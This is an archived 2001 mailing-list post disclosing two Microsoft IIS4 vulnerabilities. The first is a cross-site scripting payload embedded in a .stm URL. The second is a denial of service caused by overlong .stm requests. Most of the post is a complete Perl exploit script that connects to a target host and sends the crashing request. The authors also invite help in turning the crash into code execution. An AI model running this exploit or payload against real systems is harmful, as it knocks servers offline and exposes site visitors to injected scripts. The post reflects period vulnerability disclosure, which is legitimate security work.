Vulnerability Development mailing list archives
New D.O.S on IIS4 & a new cross site scripting vuln
From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200
--[ iSecureLabs.com French Security Team ]-- We have found 2 vulnerability on Microsoft IIS4 - Cross Site Scripting - D.O.S --[ The first one: It is a cross site scripting, using this crafted url http://server.com/foo/<script>alert('test')</script>.stm it will execute the JavaScript code on your computer. --[ The seconde one: By requesting several times a .stm file 500 char long (http://server.com/foo/[a x 500].stm) the IIS4 server crash. Perhaps it is possible to use this vulnerability to execute arbitrary code. We are currently working on a way to exploit this vulnerability. If someone wants to help us, it is ok ;-) Here is the exploit for the D.O.S one: ---<cut>--- #!/usr/bin/perl # IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com - http://www.iSecureLabs.com use IO::Socket; if (@ARGV <2){print "Usage: ./stm.pl <host> <port>\n"; exit;} $overflow = "a" x 500; sub connect() { $Socket= IO::Socket::INET->new(Proto=>"TCP", PeerAddr=>$ARGV[0], PeerPort=>"$ARGV[1]",) or die "Connection impossible a $ARGV[0] : f$!\n"; $Socket -> autoflush(1); print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n"; print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n"; print " > Server response:\n\n"; while(<$Socket>){ chomp ($reponse = <$Socket>); print "$reponse\n"; } print "\n> Data Sent. Server crashed.\n"; close $Socket; } &connect; ---<cut>--- Cabezon Aurélien aurelien.cabezon () iSecureLabs com http://www.iSecureLabs.com
Current thread:
- Anyone have any real world Xp on this? Adams, Jason (Mar 28)
- Re: Anyone have any real world Xp on this? Nelson Brito (Mar 28)
- New D.O.S on IIS4 & a new cross site scripting vuln Admin [iSecureLabs] (Mar 29)
- Re: Anyone have any real world Xp on this? Nelson Brito (Mar 28)